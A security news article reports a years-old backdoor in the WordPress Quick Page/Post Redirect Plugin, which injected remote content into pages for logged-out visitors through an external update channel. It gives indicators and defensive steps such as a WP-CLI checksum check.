Backdoored WordPress redirect plugin stayed hidden for years
6 min. read 
Published on
A WordPress plugin used for page and post redirects was found with a years-old backdoor that could inject content into websites without showing it to logged-in administrators. The affected plugin is Quick Page/Post Redirect Plugin, which had more than 70,000 active installations before WordPress.org temporarily closed it for review.
The issue was uncovered by Austin Ginder of Anchor Hosting after a routine security check flagged unusual files on 12 customer sites. Those sites reported that they were running version 5.2.3, but the plugin files did not match the official WordPress.org release.
Access content across the globe at the highest speed rate.
70% of our readers choose Private Internet Access
70% of our readers choose ExpressVPN
Browse the web from multiple devices with industry-standard security protocols.
Faster dedicated servers for specific actions (currently at summer discounts)
The tampered version contained code that contacted a third-party server and prepended returned content to public pages. The behavior was hidden from logged-in users, which made it harder for site owners and administrators to notice.
What happened
Quick Page/Post Redirect Plugin is a utility plugin that lets WordPress site owners create redirects for posts, pages, and custom URLs. The danger came from a hidden update channel that pointed outside the official WordPress.org plugin repository.
Ginder’s analysis found that versions 5.2.1 and 5.2.2 included a self-updater that contacted anadnet.com. That external update mechanism later delivered a tampered 5.2.3 build to some sites in March 2021.
The official WordPress.org version and the tampered version used the same version number, but their file hashes did not match. That made ordinary version checks unreliable.
At a glance
| Item | Details |
|---|---|
| Affected plugin | Quick Page/Post Redirect Plugin |
| Plugin author account | anadnet |
| Reported active installs | More than 70,000 before closure |
| Suspicious version | Tampered 5.2.3 build from external update server |
| Original update-channel change | Added in October 2020, according to SVN history reviewed by Anchor |
| Main risk | Hidden content injection and possible remote code delivery |
| WordPress.org status | Closed temporarily as of April 14, 2026, pending review |
How the backdoor worked
The tampered plugin hooked into WordPress page content and ran on public views of posts and pages. It checked whether the visitor was logged out before contacting the remote server.
That condition mattered. A site administrator checking the website while logged in would not see the injected material. Search engine crawlers and regular visitors could see different content.
Ginder said the remote server received the site name, page URL, and user agent. This setup allowed the operator to decide what content to return based on who was viewing the page.
Why the attack stayed hidden
The most important trick was the version number. A compromised site could report version 5.2.3 while running files that did not match the official 5.2.3 package from WordPress.org.
That means a site owner or scanner looking only at version numbers could miss the compromise. The plugin looked current enough, but the actual files had changed.
The remote content server is now offline, according to Ginder’s analysis. That means the backdoor appears dormant, but the issue still matters because the code remained on affected websites for years.
The update channel created the real risk
The plugin’s custom update checker created a path for code to arrive from outside WordPress.org. Once a plugin trusts an external update server, WordPress.org is no longer the only source of code for that plugin.
Anchor’s review of the plugin’s SVN history found that the update checker was added in October 2020 and removed from later official source code in February 2021. Existing installs that had already received the updater could still contact the external server.
In March 2021, affected sites pulled the altered 5.2.3 build from that external update path. That build added the hidden content injection behavior.
WordPress.org has closed the plugin
The WordPress.org plugin page now says Quick Page/Post Redirect Plugin has been closed as of April 14, 2026 and is not available for download. The closure is listed as temporary while a full review continues.
The same page still shows older user reviews from 2022 complaining about injected spam, adware, and content hidden from administrators. Those older complaints suggest that suspicious behavior had been noticed publicly years before the 2026 review.
Ginder also noted that a 2022 support forum report included indicators related to the suspicious code. However, by then, the official WordPress.org source no longer contained the same code path.
Why this matters for WordPress site owners
This case shows why supply chain attacks can survive normal plugin updates and routine scanning. A plugin can look legitimate, keep a normal version number, and still run code that came from outside the official repository.
The risk is especially serious for redirect, SEO, analytics, and content-management plugins because they often touch front-end page output. If attackers control that output, they can inject spam links, phishing content, malicious redirects, or parasite SEO pages.
Even when the command server goes offline, site owners should not treat the plugin as safe. Dormant code can become active again if the related domain or subdomain starts responding.
What administrators should do
- Check whether Quick Page/Post Redirect Plugin is installed on any WordPress site.
- Uninstall the plugin if it is present, especially on sites with unknown file integrity.
- Replace it with an actively maintained redirect plugin.
- Run WP-CLI checksum verification against WordPress.org-hosted plugins.
- Review public pages while logged out or from a clean browser session.
- Check server logs for calls to anadnet.com or w.anadnet.com.
- Scan for unexpected content injection hooks in plugin files.
- Audit search results for spam pages or strange indexed content tied to the site.
The most reliable check is file integrity verification. WP-CLI can compare installed plugin files against the official WordPress.org checksum data.
If the checksum does not match, administrators should treat the plugin files as untrusted. Reinstalling the official package may remove the altered files, but replacing the plugin entirely is safer for many site owners.
WP-CLI checks can detect tampering
Ginder recommended using the built-in WP-CLI checksum verifier. This method compares plugin files on disk with the official WordPress.org checksum feed.
For this plugin, administrators can run the following command:
wp plugin verify-checksums quick-pagepost-redirect-pluginIf WP-CLI reports that a file checksum does not match, the site may have a tampered copy. This check catches file changes that version-based scanners can miss.
Recommended replacements
Site owners who still need redirect management should move to a maintained alternative. Anchor recommended Redirection by John Godley or Safe Redirect Manager.
Before switching, administrators should export or document existing redirect rules. They should also test key URLs after migration to avoid broken redirects or traffic loss.
For larger fleets, teams should add scheduled checksum verification to their maintenance process. This can catch future cases where plugin files drift from the official package.
FAQ
The affected plugin is Quick Page/Post Redirect Plugin.
Reports say the plugin had more than 70,000 active installations before WordPress.org closed it for review.
No. WordPress.org says the plugin has been closed as of April 14, 2026 and is not available for download while a review continues.
The tampered build used the same version number as an official release. Tools that checked only the version number could miss the file-level changes.
Read our disclosure page to find out how can you help VPNCentral sustain the editorial team Read more
Improve this guide
User forum
0 messages